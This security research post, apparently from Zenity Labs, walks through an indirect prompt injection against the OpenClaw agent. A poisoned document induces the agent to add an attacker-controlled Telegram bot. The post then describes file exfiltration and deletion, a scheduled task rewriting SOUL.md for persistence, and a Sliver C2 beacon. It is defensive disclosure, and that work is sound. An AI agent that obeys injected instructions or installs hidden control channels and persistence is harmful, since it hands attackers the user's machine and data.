OpenClaw or OpenDoor?

Indirect Prompt Injection makes OpenClaw vulnerable to Backdoors and much more.

Summary:

  • OpenClaw processes untrusted content from chats, skills, and external data sources without hard isolation from user intent.

  • Indirect prompt injection can be used to induce persistent configuration changes in the agent.

  • An attacker can establish a backdoor via a zero-click attack by adding a new chat integration under their control.

  • Once compromised, OpenClaw can be abused to execute commands, exfiltrate and delete files, and perform destructive actions on the host.

  • The agent’s persistent context (SOUL.md) can be modified and reinforced using scheduled tasks to create a long-lived listener for attacker-controlled instructions, maintaining persistence even after the original backdoor is closed.

  • The compromise can be further escalated by using OpenClaw to deploy a traditional C2 implant on the host, enabling the transition from agent-level manipulation to complete system-level compromise.

  • No software vulnerability is required. All attacks abuse OpenClaw’s intended capabilities.

Backdoor Demo

The following video shows the backdoor in action. In the sections that follow, we analyze this flow in detail and show how the initial access is established, how control is maintained, and how it can be scaled further.

Introduction

OpenClaw is everywhere. Over the past weeks it has dominated social media, GitHub, and technical forums, framed as the next leap in autonomous AI agents. Blog posts, demos, and threads showcase an always-on assistant that lives inside chat platforms, executes tasks on behalf of users, and operates continuously with minimal oversight. For many, OpenClaw represents the future of personal and local automation.

OpenClaw is an open-source autonomous agent that runs on user-controlled infrastructure and integrates with multiple chat platforms to receive instructions and execute actions. Unlike traditional chatbots, it is designed to act, not just respond. Depending on configuration, it can invoke tools, interact with external services, read and write files, and execute commands using the permissions granted during setup. Once deployed, OpenClaw becomes a long-lived process that listens, reasons, and operates on the user’s behalf.

On top of that, OpenClaw also integrates with social connectivity platforms that have already gained significant traction. It can interact with content from the web as well as dedicated bot-only social platforms, most notably Moltbook. As we covered in a previous Zenity Labs post, Moltbook has already served as a real-world surface for agent-to-agent attacks, further expanding OpenClaw’s exposure to untrusted input.

So where is the problem?

OpenClaw’s primary interface is conversation. Users connect the agent to one or more chat platforms and then delegate tasks by sending natural language instructions. Chat serves as both the control plane and the feedback channel, allowing the agent to run continuously and accept new instructions over time.

To be useful, OpenClaw must ingest external content. It is designed to consume data from untrusted sources as part of normal operation. This includes messages sent by other users in shared chats, content retrieved from the browser, and data returned by skills and plugins. In practice, OpenClaw is expected to read, interpret, and act on information that originates outside the user’s trust boundary.

During installation, OpenClaw encourages users to enable built-in skills that extend its capabilities. One of the baked-in skills surfaced early in the setup flow is a Google Workspace integration.
This skill allows OpenClaw to connect directly to a user’s Google environment and interact with emails, calendar invitations, documents, and other Workspace resources. While other skills are available via ClawHub.

From a functionality perspective, this integration is convenient. From a security perspective, it significantly expands the set of untrusted inputs the agent consumes. Email bodies, calendar descriptions, document contents, and shared resources are all authored by third parties and are routinely processed by OpenClaw as part of delegated tasks.

At the same time, OpenClaw does not treat these inputs as passive data. Content retrieved through chat integrations, browser access, or skills is processed in the same conversational and reasoning context as direct user instructions. In our testing, we did not observe guardrails designed to detect or block indirect prompt injection attempts. Instead, OpenClaw appears to rely primarily on the foundational model’s built-in safety and alignment mechanisms to distinguish between legitimate user intent and untrusted content.

There is no hard separation between what the user explicitly asked the agent to do and what the agent reads while performing that task. Once untrusted content is ingested, it can influence the agent’s internal task interpretation in the same way as user-provided instructions.

This design choice matters because OpenClaw is not a passive assistant. It is designed to take actions. When untrusted input can shape the agent’s understanding of its task, it can also shape what the agent decides to execute. Those actions are performed using the permissions and integrations already granted by the user, often in the background and without additional confirmation.

In the sections that follow, we show how this lack of separation allows an attacker to inject behavior into OpenClaw through Indirect Prompt Injection. We demonstrate how this can be escalated from unintended actions into a persistent control channel, where the agent\system continues to accept attacker instructions long after the original task has completed.

The First Step: From untrusted content to a full backdoor.

Our attack starts with a common enterprise deployment scenario.

An employee installs OpenClaw on their workstation and deploys it as a personal productivity agent, powered by a state-of-the-art model such as GPT-5.2. To make the agent useful in day-to-day work, the user integrates OpenClaw with the organization’s Slack Enterprise workspace, using the native Slack integration as documented by OpenClaw. This allows the user to communicate with their OpenClaw instance directly from Slack, delegate tasks, and receive results inside an enterprise collaboration environment.

Next, the user connects OpenClaw to the organization’s Google Workspace. This integration is enabled through a built-in skill and allows the agent to access enterprise email, calendars, and documents. At this point, OpenClaw is operating with legitimate permissions inside two core enterprise systems: the internal messaging platform and the corporate productivity suite.

It is worth noting that while the Google Workspace integration provides a concrete and relatable example, it is not a prerequisite for the attack. Indirect prompt injection can be introduced through any untrusted content that OpenClaw consumes as part of normal operation, regardless of the specific integration. Browser access, third-party skills, shared documents, emails, calendar invitations, and even messages from other users in chat channels all represent viable entry points.

With that in mind, we now move on to the attack itself.

Attack Overview: Establishing a Persistent Backdoor

From the attacker’s point of view, the objective is not immediate execution, but persistent control.

The attack begins with a document containing attacker-controlled content. The document is structured to appear benign, with legitimate enterprise-style text at the top. Deeper in the document, an indirect prompt injection payload is embedded in a way that causes it to be processed by OpenClaw as part of a normal delegated task rather than as an explicit instruction from the user.

When OpenClaw processes the document, the injected content influences the agent’s internal task interpretation. Instead of only performing the user’s intended action, the agent is steered into making an additional configuration change. Specifically, it is induced to create a new chat integration using a messaging platform selected by the attacker.

In our proof of concept, this integration is a Telegram bot. The injected instructions provide an allowlist entry for the attacker’s account and a bot token generated by the attacker in advance. Once the integration is created, OpenClaw begins accepting and responding to messages from the attacker-controlled bot.

At this point, the original enterprise context has fulfilled its role. The Slack integration and any Google Workspace access were only needed to deliver the initial untrusted content. From this stage onward, the attacker interacts with OpenClaw exclusively through the newly added chat channel. The choice of the original platform is irrelevant. Whether OpenClaw was initially connected through Slack, WhatsApp, Discord, Telegram, or another supported service does not affect the outcome. The attacker may remove the original integration or leave it in place.

From OpenClaw’s perspective, this transition is entirely legitimate. The agent is simply receiving instructions through a supported integration that it was configured to trust. No alerts are triggered and no enterprise control plane is involved. What results is a persistent external control channel that exists outside organizational visibility.

In the accompanying video, the attacker prepares the Telegram bot in advance and waits. When OpenClaw completes the injected configuration change, the attacker receives a message confirming that the integration is active. From that moment on, the attacker can issue commands to OpenClaw through the bot. For example, the attacker can request a listing of files on the user’s desktop. From there, the agent can perform any action that a legitimate user could perform through a chat integration, using the same permissions and capabilities already granted.

We intentionally do not disclose the exact indirect prompt injection used to achieve this behavior. The important point is the outcome: untrusted content can induce a persistent configuration change, resulting in long-term attacker access to the agent.

So what problems can we cause now?

Once a persistent backdoor is established, the attacker can begin abusing OpenClaw directly. Even without additional tooling, this already enables meaningful malicious actions. Because the agent operates with the user’s permissions, it can execute commands on the user’s machine, interact with the local file system, access sensitive data, and perform destructive operations.

In the first demo, we show a basic example of this capability. The attacker interacts with OpenClaw through the backdoor and instructs it to locate files on the victim’s machine, exfiltrate their contents to an attacker-controlled endpoint, and then permanently delete them from the local file system. These actions are performed entirely through the chat interface and require no further exploitation. 

While this demonstrates immediate impact, the more concerning outcome is persistence and consistency of control.

OpenClaw maintains a file named SOUL.md which defines the agent’s identity, tone, and behavioral boundaries. This file is injected into the agent’s context during every interaction and plays a central role in shaping how the agent reasons and responds over time.

The Soul file content.

Using the established backdoor, an attacker can modify this file to influence OpenClaw’s long-term behavior. In our proof of concept, we leverage this mechanism to introduce persistence at the operating system level. Specifically, we instruct OpenClaw to create a scheduled task on the victim’s Windows system that runs at regular intervals. This task periodically modifies SOUL.md, ensuring that attacker-controlled instructions are continuously re-injected into the agent’s context.

In the accompanying demo, the scheduled task runs every two minutes and updates SOUL.md with logic that directs OpenClaw to retrieve additional instructions and configuration data from an attacker-controlled external endpoint. This allows the attacker to dynamically influence the agent’s behavior over time without maintaining an active chat session.

At this stage, control extends beyond a single backdoor interaction. Even if the original chat integration is removed or the initial control channel is closed, the agent’s behavior continues to be influenced through persistent modification of its core configuration. The result is durable attacker control, surviving restarts and operating independently of the original entry point.

Scaling our hold

Establishing a persistent backdoor into the agent is a critical milestone, but it is effectively just the beginning. Because OpenClaw operates as a process on the host machine with privileges to run commands, download data and execute files, an attacker can pivot from manipulating the agent to compromising the underlying host itself.

One of the most immediate ways to escalate this access is by deploying a Command and Control (C2) implant. In the demo, we show this by instructing the agent to download and execute a Sliver C2 beacon. This effectively upgrades the compromise from a “rogue AI agent” scenario to a more traditional, remote access implant.

With this level of access, the attacker is no longer bound by the agent’s constraints. In the video below, we demonstrate traversing the victim’s file system and leaking sensitive data. But the impact goes further: a C2 channel serves as a launchpad for lateral movement, privilege escalation, credential harvesting, or the deployment of ransomware, turning a helpful assistant into a critical entry point for enterprise compromise.

Conclusions

In this post, we demonstrated how OpenClaw can be abused to establish a persistent backdoor on a victim’s endpoint through a zero-click attack, how that access can be made consistent and durable, and how it can be scaled further into a full command-and-control compromise. What begins as influence over an autonomous agent can quickly turn into control over the underlying host.

Importantly, neither the entry vector nor the specific deployment configuration is fixed. The attack does not depend on a single integration, a specific data source, or even a particular underlying model. Untrusted input can be delivered through a wide range of channels, and the model backing OpenClaw can be swapped without materially changing the outcome. Relying solely on model alignment and built-in safety mechanisms is not sufficient. In its default configuration, OpenClaw does not enforce hard guardrails or rules that prevent the attacks demonstrated here.

We showed how the backdoor can be escalated beyond the agent itself by deploying a traditional C2 implant, such as Sliver, turning an AI assistant into a launch point for full host compromise. At that stage, the agent is no longer the limiting factor. With this level of access, additional abuse paths and escalation scenarios become straightforward. We intentionally leave the full range of potential exploits and outcomes to the reader’s imagination.

This highlights a broader lesson for agentic systems. As we move toward a world of personal, always-on assistants that can act on our behalf, security cannot be treated as a secondary concern or deferred to the model layer. Autonomous agents operate at the intersection of untrusted input and privileged execution. Without strong isolation, explicit controls, and enforceable boundaries, they become attractive targets rather than trusted helpers.

If personal AI assistants are going to live on our endpoints and inside our workflows, compromising on security is not an option.

Reply

or to participate.